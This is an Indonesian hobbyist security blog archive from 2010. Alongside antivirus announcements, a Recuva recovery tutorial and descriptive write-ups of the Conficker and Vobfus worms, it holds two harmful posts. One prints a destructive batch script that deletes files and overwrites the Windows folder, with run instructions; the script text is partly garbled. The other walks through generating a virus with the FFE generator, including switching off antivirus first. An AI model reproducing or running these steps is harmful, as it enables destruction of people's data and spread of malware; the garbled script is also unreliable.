Selasa, 23 November 2010

Celah Keamanan Windows Melaui Command Prompt

Temen2 passsti pernah denger command prompt kan??! Yups, bener banget command prompt atau yang sering disebut orang DOS ini ternyata bisa menjadi Boomerang dan celah keamanan yang amat berbahaya! Kok bisa??! Padahal cuman tampilan item dengan tulisan warna putih aja??! Ya jelas bisa . . . pengen tau kenapa??! To pengen tau caranya .. . hayo . . . ya udah ga usah malu2… . lanjutin aja bacanya . . . tapi jangan disalahgunakan ya. . . .

Yups! Jelas bisa temen2 . . . . pasalnya, selain digunakan untuk mengontrol windows dengan cara mengetikan perintah to command2 secara langsung diarea kerja DOS, command prompt  juga bisa dijalankan melalui batching....! apaan sich bacin- bacin tuh kak . . . Q jadi bingung . . .! eh bukan bacin tau!! Tap batching . . yaitu remote command prompt dengan suatu perintah yang dituliskan pada sebuah file yang berekstensi .bat! jadi hanya dengan meng-eksekusi file .bat nya, semua perintah pun dijalankan! Contohnya sederhananya aja perintah delete, bayangin aja jika perintah ini di batch in, d:/del*.*??!! habiz deh semua file di drive D! Ngeri banget bukan . .  ada lagi yang ga kalah ngerinya, yaitu dengan batching injected file. Metode menginjeksi file (file apapun) dan membuat file tersebut rusak dan TIDAK AKAN BISA DIREPAIR LAGI... termasuk file image seperti bmp, psd, jpeg, jpg, gif dan ico. Hanya dengan syntax sederhana sebagai berikut:

@echo on

echo This method will injects your files in rootdirectory

pause e

cho are you sure/ if yes press enter, if not press alt+F4

echo InjectFile > C:\WINDOWS\*.*

exit

jika injeksi metode batching ini anda jalankan dengan mengetikkan syntax di atas dan menyimpannya dengan ekstensi ".bat" dan anda double click, maka rusaklah semua file yang sedang tidak aktif dalam folder WINDOWS. Dan alhasil ketika kamu restart, komputermu udah wafat... alias modarrrrrr!!!!

Tindakan pencegahan (file bat sederhana):

- Hindari eksekusi langsung file .bat

- Gunakan deepfreeze

-eh iiya. . . satu lage . .  at2 dijalan yach ... loch?!@#$%&$#

Udah dulu temen2 semoga bermanfaat dan semoga membuat kalian semakin waspada dan tidak menyepelekan hal yang sederhana sekalipun! Karena dibalik kesederhanaan, tersimpan sesuatu yang besar, yang tidak boleh diketahui oleh orang laen . . .! Ingat itu!!

Satu Lagi Anti Virus buatan Anak Negri! AVIGEN Anti Virus!



//

AVIGEN V 2

VB-bego.com menelurkan sebuah antivirus yang dinamakan AVIGen. AVIGen adalah software antivirus yang digunakan untuk mencari file-file yang berisi worm, hacktool, exploit script ataupun trojan. Pada versi pertama ini AVIGen hanya difokuskan untuk mencari virus-virus lokal yang saat ini banyak menginfeksi beberapa komputer di indonesia, seperti brontok, pendekar blank, fluikan dan lain-lain. berikut berita lengkapnya!

Beberapa fasilitas AVIGen antara lain:

1. Registry Tweak

2. Scan Running Process

3. Process Viwer

4. Setting FileType

5. Setting Attribut File Dan Folder

6. Tambahkan File Yang diduga sebagai Virus

7.Scan AutoRun Locations

Info lebih lengkap dan download dapat dilihat di www.vb-bego.com

Setelah sekian lama, akhirnya muncul update avigen. Bisa didownload di sini atau di

softpedia .

Senin, 22 November 2010

Gampang buat Virus (Part I) dengan FFE

Klo udah baca judulnya temen2 pasti pada pengen tau gimana caranya?! Apa iya buat virus itu gampang...??!! Iya khan?!! Hayo ngaku!!!

Iya! Beneran.. memang gampang kok! Tinggal clik kanan klick kiri, ketik sana ketik sini, jadi deh! Pengen tau caranya...

Mari mari masuk, kita bicarakan di dalem biar tambah enak getzu... hehehehe...

Dalam dunia per Virus an ada yang namanya Virus Generator. Yaitu sebuah aplikasi atau software sederhana yang digunakan untuk membuat virus. Ada banyak virus generator salah satu diantaranya adalah FFE. Tau ga apa itu FFE? Du paan yach FFE? Gue juga ga tau.. hehehe.. FFE adalah Fast Firus Engine atau enaknya ngomong Mesin Cepat Pembuat Virus! Sebenernya sich program ini dibuat hanya untuk tujuan pendidikan dan tidak untuk merusak. Tapi banyak sekali User yang menyalah gunakan. Program ini dibuat dengan menggunakan pemrograman Visual Basic yang yang di-compile dengan metode Native- Code kemuadian di Kompresi agar ukuran semakin mini dengan menggunakan Packer tELock. dalam paketnya terdapat dua buah file, yaitu Fast Firus Engine.exe sebagai mesin Utamanya dan data.ex_ yang merupakan badan virus yang belum dimodifikasi... untuk lebih jelasnya, praktek langsung aja yach! Yo masuk dulu lah biar lebih enak...

Tapi sebelumnya download programnya dulu Download disini.

Gimana udah belum downloadnya... klo udah, ekstraksi terlebih dahulu file ffe.exe ke lokasi yang kamu inginkan. Uppss satu lagi yang ketinggalan! dan inilah yang terpenting!  matikan dulu anti Anti Virus kamu biar proses pembuatannya lancar tiada halangan suatu apa... hehehehehe . . . .

double click program fast Firus Engine.exe kemudian kita bakalin diadepin sama interface yang kayak gene :

Keliatan ga?! Ga ya?! Buka dulu matanya dong.. nah... Keliatan khan... nah disitu kita cuman Diminta dengan hormat untuk memasukkan nama Pembuat di textbox "Author Of The Virus" dan memasukkan Nama Virus Di Textbox "Name Of The Virus" atau kamu juga bisa nambahin pesan2 tambahan di kolom "Your message" n pesan nya ga terbatas terserah mo selembar, dua lembar, tiga lembar basing wae lah! (terserah anda In javanese) hehehe...

udah selesai khan buat pesannya? Klo udah, click dengan sepenuh hati tombol "Generate"! Click OK! OK! Seperti yang nampak pada gambar di bawah. Taraaaa.... apa yang terjadi???!!!

Coba kamu buka di Windows Explorer, buka tepat dimana kamu menyimpan aplikasi Fast Firus Engine tadi. Akan muncul seekor Virus dengan ikon Folder di samping File FFE yang siap menyerang siapa saja yang mengganggunya. TAPI JANGAN COBA-COBA MENDOUBLE CLICK-nya yach... tapi klo mo coba2 ya silahkan... tapi ga tanggung lho klo ada apa2... hehehe... Tapi Sekali lagi saya tekan kan, Jangan Disalahkan Gunakan!!!



Caution!


sebenarnya FFE ini telah lama diciptakan, tapi Q nunggu antivirus deteksi dia sebagai virus dulu sampe  achirnya muncul posting Q ne . . . buat temen2 dagh usah takut . . . karena FFE saat ini sudah dapat di deteksi oleh semua antivirus. so, ne murni hanya untukl edukasi! n buat ngetes anti Virus aja kok!!! hehehehehe . . . Ok!!

Dah dulu yach, dah ngantuk nech bo2 dulu ah... Mpe ketemu di postingan berikutnya . . .

Source Code Wedash Antivirus ( Buatannya mas Aat Sadewa)



Wedash Anti Virus 2005 (WAV) adalah program untuk mendeteksi dan menangani virus lokal ataupun luar yang telah tersebar luas. Program ini freeware, anda dapat mengupdate sendiri virus listnya tanpa harus mendonlot dari internet jika anda menemukan virus baru. Anda dapat mendonlot WAV 2005 exe-nya, installer dan update (signatures.db). Selain itu ada dokumentasi untuk menjalankan program WAV tersebut berbentuk .doc. Dalam waktu dekat akan dirilis atau dibagikan source code WAV untuk dikembangkan secara massal (rame rame mas!)

Di Album Cyber kita bisa membuat antivirus wedash, dengan mendownload codenya disini:

Free Download (Kode Wedash Antivirus) 

Kemo Antivirus

Satu lagi Antivirus buatan anak negeri, namanya Kemo Antivirus.

12893267901851856116

berikut Fitur - fitur yang bisa kamu dapatkan dari kemo antivirus . . .

1. Kemo Anti Virus adalah AV Local Indonesia dengan Kemampuan penanganan Virus/Malware dengan baik.

2. Kemo AV 100% Free.

3. Kemo Manual Tools Weapons [ Senjata Manual ] yang mudah dan ringan di gunakan.

4. Kemo Process Manager [ Untuk Melihat dan Mematikan Proses yang sedang Berjalan di Windows/System.

5. Kemo Exception [ Pengecualian File >> Masukan File yang Menurut Anda Kemo tidak Perlu Men-Scannya ].

6. Kemo Malware User [ Untuk Menambahkan database sementara anda sendiri apabila Kemo tidak bisa mengenali Malware yang Menyerang PC anda ].

7. Kemo Automatic FD Scanner [ Apabila Aktif Kemo akan otomatis menyampaikan Konfirmasi Scan setiap Flashdisk yang masuk ]

8. Kemo AV Defender [ Real Time Protection ] akan selalu menjaga Komputer anda dari serangan Malware.

9. Kemo Heuristic Method

Menggunakan metode Heuristic untuk Memburu serta mendeteksi Malware terutama Malware yang belum masuk Kemo Database serta memiliki kemampuan ‘ Kemo File Infected Detector ‘ dimana Kemo AV mampu mendeteksi File yang terinfeksi atau Ter “Inject” Oleh Virus Seperti ==>> W32/Tanatos - W32/Sallity - Alman.A - Alman.B

>> W32/RunOnce [ Beserta Desinfectnya ] - Mabezart - Downloader.NAE

>> W32/Expiro

>> Mendeteksi Shortcut Virus seperti EXP/Exploit yang sering digunakan oleh Malware seperti

>> VBS.Yuyun - TR/Stuxnet - Random8 - Vir/Shortcut - Worm/VBNA.a1

10. Kemo External And Manual Weapons

Adalah Tools yang terletak di luar Komponen Kemo AV Kemo Rev 8.1 >> di Folder Bonus atau External Tools

A. Kemo Anti Autorun Malware [ Flash Drive ]

Program kecil ini berguna untuk membuat file Autorun.inf Folder autorun.inf yang dibuat telah dilindungi jadi tidak akan mudah dihapus atau dimasuki dengan cara biasa. Hal ini bermanfaat untuk melindungi Drive atau Removable anda dari virus yang mencoba membuat autorun.inf dalam penyebarannya.

B. Kemo Folder Protector

Proteksi folder 1.0 adalah sebuah software kecil yang berguna untuk melindungi folder - folder penting anda. dengan anda melakukan proteksi folder,saya jamin folder anda akan aman dari penglihatan orang yang tidak berhak untuk melihatnya, bukan hanya itu folder andapun tidak akan bisa dihapus secara manual sebelum di Un-Protect. [ Bila Di deteksi sebagai VIRUS itu adalah FALSE ALARM ]

C. Kemo ReplaceIcon

Tools Kecil ini Bermanfaat untuk mengganti Icon Program Anda tanpa Decompilenya terlebih dahulu..

7. Kemo in The Future

- Penambahan Skin Kemo sehingga Theme Formnya bisa diganti.

- Icon Tray yang meredup saat Defender/RTP Kemo mati.

Kemo Home Site :

http://www.copralsoftlabs.blogspot.com/

Kemo E-Mail :

copral_cute@yahoo.co.id

NEW FEATURE USB VIRUS BLOCKER

http://www.ziddu.com/download/12318401/

New Version Kemo Antivirus 8.2.2

http://www.4shared.com/get/68OfPdb0/Kemo_AntiVirus_new.html/



Selamat Mencoba!!!

Nb : Antivirus ini masih terus dikembangkan, sehingga jika terdapat Bug di dalamnya,silahkan laporkan ke pengelolanya (kontak di atas).

Minggu, 21 November 2010

RECOVERY DATA DENGAN MENGGUNAKAN RECUVA

Entah mengapa tool recovery data ini tampil dengan ikon dan logo buah yang banyak ditemukan di daerah asia. Yaitu buah alpukat. Tapi yang jelas, tool ini tidak kalah hebatnya loh dengan tool-tool recovery terkenal lainnya. Jika dibandingkan dengan tool lainnya seperti Get data back, recuva tergolong cukup mudah dalam pengoperasiannya.

Berikut beberapa kelebihan berdasarkan pengamatan yang penulis lakukan.

Cepat
Nah…ini yang saya suka dari Recuva. Sebelum mengenal Recuva, saya sudah banyak mencoba software recovery lain. Rata-rata software itu kinerjanya relatif lambat, baik saat recovery ataupun saat scanning. Tapi recover dengan Recuva, jreng…tiba-tiba saja sudah selesai.
Pada saat saya coba, Recuva mencatat waktu 15 detik pada saat scanning flashdisk saya yang berkapasitas 2 GB, scanning dilakukan pada mode biasa bukan pada mode deep scan. Hasil scanning tersebut ditemukan 4521 file dengan berbagai kondisi . Sedangkan pada kondisi deep scan membutuhkan waktu sekitar 4 menit, jumlah file yang ditemukan sebanyak 4852 file.
Pada proses recovering, dari uji coba merecover beberapa file yang berbeda menunjukan adanya variasi kecepatan yang signifikan. Saat di coba melakukan recover file berukuran 50 MB dengan kondisi poor, membutuhkan waktu 26 detik atau sekitar 2 MB/s . Kemudian saat di coba merecover file berukuran 6 MB hanya membutuhkan waktu 1 detik. Saat di coba di file lainnya, ternyata hasilnya berbeda-beda. Namun kebanyakan proses recovering memiliki kecepatan kira-kira 2 MB/s. Semua itu tergantung dari kondisi dan letak file, kemampuan komputer serta jenis medianya.
Murah
ga cuman murah sih . . tapi  Ya… memang software ini sifatnya freeware…alias GRATIS..tis

Ringan
Oke…mungkin dalam hal ini sifatnya relatif. Bisa saja di komputer saya Recuva berjalan dengan ringannya, tapi di komputer lain yang sudah waktunya pensiun Recuva berjalan dengan sangat lambat, hingga perlu direstart berkali-kali.

Tapi memang catatan mengenai konsumsi memory dan processor dari Task Manager tidak menunjukan Recuva sebagai software yang rakus. Konsumsi memory Recuva pada saat idle hanya sekitar 1 MB, sedangkan saat proses scanning, konsumsi memory melonjak hingga 50 MB. Tapi setelah selesai scanning, penggunaan memory kembali menurun.
Akurat
Dalam hal ini, Informasi yang disediakan Recuva mengenai informasi file yang ditemukan sangat lengkap, dan inilah yang membuat Recuva akurat. Informasi tersebut mengenai kondisi file, apakah masih bagus, buruk, sangat buruk atau malah sudah wassalam alias sudah tidak bisa diselamatkan sama sekali. Selain itu, yang membuat Recuva semakin akurat , ada informasi mengenai file mana yang telah menimpa file yang hendak di recovery. File yang menimpa itulah yang membuat file yang sudah dihapus sulit di recover dengan sempurna.




Selain mode scanning biasa, ada juga mode deep scan. Proses scanningnya jauh lebih lama dari mode biasa. Mengenai mekanisme kerjanya, jangan tanya saya, coba hubungi saja pembuatnya. Yang jelas, pada mode deep scan banyak file yang sebelumnya tidak ditemukan pada mode biasa berhasil di temukan saat deep scan. File yang ditemukan di mode deep scan umumnya berada dalam kondisi bagus dan dapat direcover dengan sempurna.

Nah…sekarang kita punya alasan masuk akal mengapa harus menggunakan Recuva.Lagipula kemampuan Recuva bukan hanya merecover file yang hilang, Recuva bisa digunakan untuk menghapus secara permanen data, sehingga tidak dapat direcover kembali. Yaitu dengan memanfaatkan perintah “Secure Delete cheked” atau “secure delete highlighted” . Bagaimana? Tertarik? Baik… bila ingin memiliki segera download softwarenya. Saya juga punya download aja disini (http://www.4shared.com/file/QG762Rr3/recuva.html )

Oke langsung saja ikuti tutorial singkatnya. . . . .

Untuk dapat menggunakan tool ini terlebih dahulu temen-temen harus menginstal file installer recuva. Jika anda belum mempunyai file tersebut, anda bisa men downloadnya di internet. Silahkan cari sendiri . . . banyak kok bertebaran di internet . . . hehehehehe . . . atau kalau tidak anda bisa menggunakan Hiren’s boot CD wintools seperti yang saya gunakan saat ini. Berikut langkah nya :

  1. Masukkan Hiren’s boot CD wintools.

  2. Klik menu, sorot recovery pilih dan klik recuva untuk mulai menggunakannya.

  3. Akan muncul jendela welcome Wizard. Kemudian Pilih next untuk melanjutkan.

  4. Nah ini salah satu fitur yang menurut saya berbeda dan lebih menarik daripada  get data back yang sering saya gunakan  yaitu metode pencariannya. Kita bisa memilih jenis file apa yang ingin kita kembalikan untuk pencarian  dan yang lebih spesifik, akurat dan cepat. Dalam hal ini tersedia pilihan berdasarkan jenisnya yaitu :

  5. Setelah memilih kategori yang kita inginkan, selanjutnya pilih lokasi dimana data kita hilang. Misalkan di drive c:/

  6. Centak checkbox enable deep scan untuk hasil yang maksimal namun akan membutuhkan waktu yang lebih lama. Kemudian klik start untuk memulai pemindaian dan pencarian.

  7. Tunggu hingga proses selesai. Selamat Mencoba!

Jumat, 19 November 2010

Convert File Word Ke PDF Online

Bagi temen2 yang males install program word to pdf ke komputer dengan alasan menuh2 in ruang hard disk, layanan Online ini patut dicoba! ;langsung aja kunjungi http://www.doc2pdf.net/


di bagian paling bawah, akan ada form yang meminta anda untuk mengupload file yang berformat PDF trus klik tombol convert document! selesai deh . . .

Jumat, 12 November 2010

Morphost Antivirus Versi 8



Morphost Antivirus Versi 8

Kali ini MorphostLab kembali merilis antivirus terbarunya. Morphost Versi 8. Banyak revisi dan pembaharuan pada versi ini dari versi sebelumnya. Mulai dari detektor, scanning, database dan tools-nya. Namun pada dasarnya Morphost versi 8 ini hampir sama dengan versi 7.

Tampiilan lebih landscape! INGIN TAU LEBIH BANYAK TENTANG MORPHOS??! yuk ikuti selengkapnya . . .

Kalau versi-versi Morphost sebelumnya terlihat portrait, versi kali ini Morphost dibuat lebih landscape. Morphost versi 8 ini terlihat lebih menawan dibanding versi sebelumnya. Ditambah lagi campuran warna hijau muda dan tua-nya yang makin fresh. Tidak seperti versi-versi sebelumnya yang hanya menggunakan hijau tua saja.

Move-up and move down! Come on guys!

Morphost versi 8 makin ter-animasi saja! Kalau anda menekan tombol “scanning” dan “database” tombol lain akan bergeser move-up and move-down. Anda bisa coba sendiri. Selain itu, listview untuk “Virus Found” dan “Dugaan Virus” juga telah menggunakan teknik ini. Geser kanan dan geser kiri!

Bagaimana dengan tools barunya?

Sebenarnya tidak banyak penambahan tools di versi baru ini. Tapi ada satu tools yang cukup bagus di versi ini. Anti-Keylogger‼! Nah, tools ini bisa anda gunakan untuk mengecek apakah ada keylogger di komputer anda. Sangat cocok digunakan di komputer warnet dan komputer-berbagi.

Apakah Morphost versi 8 mati saat scanning?

Nah, untuk menjawab pertanyaan ini, perlu penjelasan yang cukup rumit. Untuk kerusakan pada versi 7 kemarin telah diperbaiki di versi 8 ini. Tidak ada lagi yang namanya “Mati saat scanning” pada versi 8 ini.

Tapi di beberapa komputer yang jumlah filenya sangat banyak (luar biasa banyak), terkadang Mophost bisa not-responding. Ini bukan diakibatkan karena kerusakan pada scanning Morphost, melainkan karena Morphost tidak kebagian memory.

Penambahan 6 Detektor Baru!

Ada enam detektor yang ditambah di versi kali ini. Dua detektor untuk induk virus, satu detektor untuk keylogger dan 3 detektor lain untuk shortcut virus. Nah, Morphost versi 8 ini dijagokan untuk memproteksi komputer dan laptop dari virus-virus shortcut yang belakangan ini beredar. Dan banyak flashdisk yang terinfeksi karena malware ini.

Dengan Morphost 8, virus yang menghinggapi flashdisk anda dapat terdeteksi! Kami sebut virus ini “RandomShortcut”

Cara update database-nya makin gampang!

MorphostLab telah memudahkan anda semua untuk mengupdate database Morphost. Hanya satu kali klik, tunggu hingga 100%, database Morphost telah terupdate‼! Tentunya dibutuhkan koneksi internet untuk hal ini.

Bagaimana dengan RTP Morphost?

RTP Morphost sampai saat ini berstatus “siap menjaga komputer anda”. Morphost telah stand-by mengeluarkan alarm jika ditemukan virus. Ada sedikit perubahan tampilan RTP-nya. Dan kini RTP pun sudah lebih baik dibanding RTP sebelumnya.

Buzz! Buzz! And BUZZ‼!

Anda tahu efek Buzz pada YahooMessenger? Kalau anda sering ber-YM tentu anda tahu istilah “BUZZ”. Jadi efek buzz ini seperti efek bergetar…

Begitu Morphost menemukan virus, RTP Morphost akan bergetar alias “nge-buzz”‼!

FalseAlarm makin kecil!

Nah, belajar dari pengalaman versi terdahulu, kemungkinan false alarm pada versi 8 ini telah diperkecil. Kesimpulannya, anda tidak perlu takut lagi dengan false alarm. Morphost telah membagi dua kolom semua hasil deteksinya. Kedua kolom itu adalah “Virus Ditemukan” dan “Dugaan Virus.” Jadi semua yang masuk ke dalam kolom list “Dugaan Virus” masih berstatus “DUGAAN”

Mari download Morphost versi 8.

Anda bisa download Morphost versi 8 disini.



Rabu, 10 November 2010

Virus??! Panganan Opo Kui??!

Virus Alert!

Salam Virus Mania!!!

Untuk yang pertama kali nya saya berbagi ilmu tentang dunia pemrograman Virus. Dan untuk kesekian kalinya saya berpesan kepada temen-temen semua. Jangan menyalahkan ilmu yang telah saya bagikan! Ilmu apa saja jika disalah gunakan pasti berahir dengan kerugian baik bagi diri kita sendiri maupun orang lain… Ilmu kedokteran misalnya, klo disalah gunakan pasti fatal jadinya! Iya ga?!  Lha kok malah ngelantur... wkwkwkwkw..

Saya berbagi bukan untuk menjahili orang tapi semata-mata untuk tujuan pendidikan, saling berbagi ilmu pengetahuan.... hehehe... kembali ke lap! Top!

Virus??!  Panganan Opo kui??!

Tentu Sebagian temen – temen ada penasaran. Virus itu kayak apa sich? Bentuk nya kayak gimana sich? Nah ayok kita simak bersama devinisi virus itu sendiri...

Siapa sich yang ga kenal virus… suatu program berbahaya berukuran  kecil mungil yang teramat sangat menjengkelkan ini sarat menjadi momok Bagi semua pengguna komputer. Gimana ga, komputer yang awalnya lancar-lancar aja tiba bertingkah laku aneh! Menjadi lelet, lola, dan running tanpa control (Mabok Bae).

Program mungil yang “ngegemezin” pengen nginjek2 ini bisa menduplikasi diri dengan menyisipkan kopian dirinya ke dalam media penyimpanan / dokumen serta ke dalam jaringan secara diem-diem alias gerilya tanpa sepengetahuan pengguna komputer tersebut. Efek nya macem-macem dari mulai munculin pesan-pesan aneh sampe merusak komputer serta menghapus file atau dokumen kita. Motif pembuatannya pun juga beragam! dari hanya karena putus cinta sampe yang berbau Komersial Alias Cari “Duit haram!”! Tapi umumnya klo virus lokal alias buatan orang indonesia tuh tujuannya cuman buat iseng aja... n Yang paling banyak tu bertemakan “ASMARA”!!! wkwkwkwk...

So Untuk lebih jelasnya, Virus itu program tersembunyi yang menjalankan fungsi2 tertentu tanpa persetujuan User alias si pengguna komputer. Tidak mempunyai interface, sopan santun, tata krama dan etika!!! Asal masuk aja acak-acak data orang tanpa permisi dan tanpa ampun!!!

Udah... udah maki-makinya... jangan marah2 trus ntar cepet tua lho..

Oh ya ya ya, udah dulu yach...

Semoga bermanfaat!

Jumat, 05 November 2010

Awas!!! Worm Downadup mulai meradang!!

Worm Downadup adalah salah satu varian dari virus baru worm yang saat ini sudah menginfeksi hampir 9 juta komputer hanya dalam waktu 4 hari. Jumlah yang tidak sedikit untuk worm yang belum lama muncul. berikut penjelasan singkatnya . . .

Nama asli Worm ini adalah Worm:W32/Downadup.gen dan mempunyai berbagai nama alias seperti : W32/Conficker.worm.gen  (Symantec), Mal/Conficker (Sophos) , Worm: Win32/Conficker (Microsoft). Selain itu juga dikenal dengan nama Conflicker dan Kido (contoh nama : Worm: W32/Downadup.gen!A, Net-Worm.Win32.Kido.ih ). Worm ini termasuk kategori Malware yang berjalan di windows 32 -bit, makanya disebut W32.

Efek dari Worm Downadup :

Worm ini menyebar dengan cara memblok website antivirus dan orang-orang yang ingin mendapat antivirus tidak jadi mendapatkannya.

Worm ini mampu mengubah/menambah fungsi internal windows (TCP) untuk memblok akses situs-situs keamanan (security/antivirus), dengan memfilter alamat yang mempunyai karakter/text tertentu. Dan untuk menghilangkan efek tersebut tidak mudah, karena boleh dibilang sudah tingkat low level programming.

Worm ini didesign untuk melindungi diri dari deteksi antivirus dengan menggunakan teknik tertentu yang jarang digunakan, melindungi diri dari upaya untuk di hapus, mematikan windows update, restore point sebelum infeksi, mematikan trafik jaringan tertentu, mengoptimalkan fitur windows Vista untuk memudahkan penyebaran, mampu menginjeksi explorer.exe, svchost.exe dan services.exe dan lainnya.

Bagi anda yang belum terkena virus ini di sarankan untuk update Sistem Operasi anda secara teratus. Sedangkan jika komputer sudah terinfeksi, maka bisa download remover tool, baik dari F-Secure atau Bitdefender dibawah ini.

Klik disini untuk mendapatkan antivirus BitDefender.

Selasa, 02 November 2010

Virus Win32 Autoruner

Apakah anda terinfeksi varian baru worm shortcut/random ??? Walaupun anda sudah meng-update antivirus, tetapi tetap saja worm tersebut mampu menyambangi komputer anda.


Setelah aksi yang dilakukan trojan Stuxnet, worm shortcut mampu mencuri perhatian sebagian pengguna komputer di Indonesia dengan penyebaran yang luar biasa. Bahkan setelah kami membuat salah satu artikel worm shortcut terbaru http://vaksin.com/2010/0810/VBWorm.BEUA/VBWorm.BEUA.htm, kami mendapatkan puluhan sample shortcut yang berbeda-beda. Kejadian ini mirip dengan worm YM (conime/secupdat) dan virus Sality yang juga menyebar cepat dengan varian yang berbeda-beda. Dengan teknik yang sama varian malware menyebar dengan memanfaatkan celah keamanan dari system Windows yaitu MS10-046 (celah keamanan .lnk/shortcut).



Dengan maraknya penyebaran malware dengan varian yang berbeda-beda, terkadang menyulitkan bagi antivirus untuk mendeteksi varian yang sama sehingga dibutuhkan sample dari virus tersebut. Tetapi ada pula beberapa antivirus yang memiliki teknologi khusus untuk mengatasi malware tanpa membutuhkan sample, sehingga dengan mudah mendeteksi dan menambahkan sendiri sesuai database yang dimiliki tanpa memerlukan update seperti Dr Web dengan teknologi Origins Tracing (lihat gambar 1).



Gambar 1, Teknologi Origins Tracing pada Dr.Web, mampu mendeteksi varian Shortcut tanpa perlu update



Varian Malware pengguna celah Keamanan .LNK (shortcut)


Hingga saat ini, telah banyak varian malware yang menggunakan celah keamanan .LNK (shortcut) untuk melakukan penyebaran secara cepat. Beberapa malware yang telah menggunakan celah tersebut diantaranya sebagai berikut :


ü Sality (Tanatos)


Varian virus polymorphic yang melakukan infeksi file executable, dan juga ternyata menggunakan celah keamanan ini untuk melakukan penyebaran. Selain melalui file yang di-infeksi, Sality membuat 2 file (1 file autorun.inf dan 1 file executable dengan nama acak) melalui media USB dan jaringan yang menggunakan full sharing (dengan menyertakan pula ratusan file executable sampah dengan nama acak).  Anda dapat membaca artikel virus Sality.


ü Zeus (Zbot atau botnet)


Varian trojan yang melakukan infeksi pada web-web bank dan finansial. Dengan menambahkan keylogger pada halaman web tersebut dengan maksud mendapatkan username dan password. Worm ini mampu menginfeksi komputer melalui celah pada browser seperti Internet Explorer dan Mozilla Firefox. Worm ini juga dapat melakukan broadcast spam kepada alamat e-mail tertentu.


ü Chymine (worm YM atau conime/secupdat).


Worm yang sangat populer menginfeksi komputer melalui media Yahoo Messenger. Dengan teknik penyebaran yang sama seperti Zeus/Zbot dan Sality, dan memiliki varian yang berbeda-beda. Anda dapat membaca selengkapnya pada artikel virus google dan virus YM.


ü Stuxnet


Trojan yang baru-baru ini menyebar dengan cepat dengan memanfaatkan koneksi jaringan dan media USB. Trojan ini membuat space harddisk kita menjadi habis. Selengkapnya dapat anda baca pada artikel stuxnet.


ü VBNA/Hllw.Autoruner (worm Vobfus atau Shortcut/Random)


Worm shortcut yang memiliki karakter seperti worm YM. Dengan menggunakan banyak file acak dan ukuran yang berbeda-beda, maka tak jarang tidak semua antivirus mampu mendeteksi varian virus worm ini. Saat ini worm ini cukup populer dan mampu menyebar dengan pesat. Anda dapat membaca salah satu artikel shorcut.



File Worm


Worm Vobfus (Visual basic Obfuscated) atau shortcut/random dibuat menggunakan bahasa pemrograman Visual Basic dan memiliki ukuran yang bervariasi tergantung varian worm. File worm juga menggunakan icon Visual Basic dengan ekstensi file exe (application) dan scr (Screen Saver). (lihat gambar 2)



Gambar 2, File worm shortcut/random



Saat menginfeksi komputer korban, worm akan membuat beberapa file induk diantaranya :


ü C:\Documents and Settings\%user%\alg.exe atau x.exe (Windows 2000/XP/2003)


ü C\Documents and Settings\%user%\[nama_acak].exe (Windows 2000/XP/2003)


ü C:\User\%user%\alg.exe atau x.exe (Vista/7/2008)


ü C\User\%user%\[nama_acak].exe (Vista/7/2008)



Dan juga membuat beberapa file virus pada removable drive/disk yaitu :




  • [nama_acak].exe

  • [nama_acak].scr



Selain itu, worm akan membuat file shortcut yang disesuaikan dengan nama folder yang telah disembunyikan. Selain itu worm akan akan membuat file shortcut yang lain yaitu :




  • Documents.lnk

  • Music.lnk

  • New Folder.lnk

  • Passwords.lnk

  • Pictures.lnk

  • Video.lnk

  • [nama_acak].lnk (hingga beberapa file)



Gejala & Efek Worm


Beberapa gejala dan efek yang terjadi jika anda terinfeksi worm ini yaitu sebagai berikut :



Ø Melindungi proses worm dan mencegah proses aplikasi/program keamanan


Worm mencoba memonitor proses yang berjalan di memori dan memastikan agar proses worm tidak dimatikan oleh program/aplikasi keamanan seperti antivirus dan removal. Jika ada program/aplikasi keamanan yang berjalan, maka worm akan mencoba menginfeksi dan membuat error pada program tersebut. (lihat gambar 3)



Gambar 3, Program/aplikasi keamanan yang di injeksi oleh worm menjadi error



Ø Menyembunyikan folder dan membuat file shortcut


Salah satu aksi worm ini mampu membuat pengguna komputer dag dig dug (kerepotan) karena menyembunyikan seluruh isi folder "My Documents" user dan menggantinya dengan file shortcut. File shortcut tersebut justru diarahkan ke salah satu file virus dengan nama acak. Beberapa varian lain hanya menyembunyikan folder dan membuat file shortcut pada removable drive/disk. (lihat gambar 4)



Gambar 4, Menyembunyikan folder pada removable dan membuat file shortcut



Ø Koneksi Remote Server dan mendownload file virus lain


Dengan memonitor proses yang berjalan, worm mencoba melakukan koneksi ke IP remote server yang dituju melalui file system yang diinfeksi seperti file explorer.exe atau svchost.exe. Setelah terkoneksi, worm mendownload varian malware lain agar tidak mudah terdeteksi dari antivirus atau removal tool. (lihat gambar 5)



Gambar 5, Worm melakukan koneksi ke remote server dan mendownload varian virus lain



Ø Modifikasi key Folder Options


Secara umum, worm ini tidak akan melakukan blok terhadap bebrapa program Windows seperti regedit, Task Manager, Folder Options, dll. Tetapi worm menggunakan cara lain agar file virus tidak mudah dilihat atau dihapus, untuk itu virus memodifikasi fitur Folder Options dengan menghapus salah satu key yang ada yaitu : (lihat gambar 6)


- Hide protected operating system files (recommended)



Gambar 6, Fitur Folder Options sebelumworm aktif



Dengan selalu mengaktifkan key tersebut, pengguna komputer tidak dapat melihat file virus bahkan menghapusnya. (lihat gambar 7)



Gambar 7, Fitur Folder Options setelah worm aktif



Metode Penyebaran


Sama seperti worm YM (conime/secupdat) dan Stuxnet, metode awal penyebaran worm ini berasal pada link website yang mengandung trojan dan link spam pada e-mail. Tetapi setelah komputer pengguna terinfeksi, worm mulai melakukan penyebaran menggunakan media removable drive/disk.



Selain itu, dalam jaringan akan memanfaatkan file sharing (full) dan mapping drive dengan membuat beberapa file virus dan shortcut. (lihat gambar 8)



Gambar 8, Worm infeksi jaringan



Modifikasi Registry


Beberapa modifikasi registry yang dilakukan oleh worm yaitu :



Ø Merubah registry


Ø Folder Options


Agar file worm tidak dapat dilihat, maka worm merubah key pada Folder Options, untuk itu virus merubah key menjadi berikut :


§ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced


ShowSuperHidden = 0



Ø Menambah registry


Ø Start-up


Agar file worm dapat langsung aktif pada saat menghidupkan komputer, maka worm menambah key sebagai berikut :


§ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


[nama_acak] = C:\Documents and Settings\%user%\[nama_acak].exe



Pembersihan Worm


Langkah-langkah yang harus dilakukan untuk melakukan pembersihan worm adalah : (lihat gambar 9)


ü Putuskan koneksi jaringan/internet.


ü Matikan System Restore (Windows XP/ME)


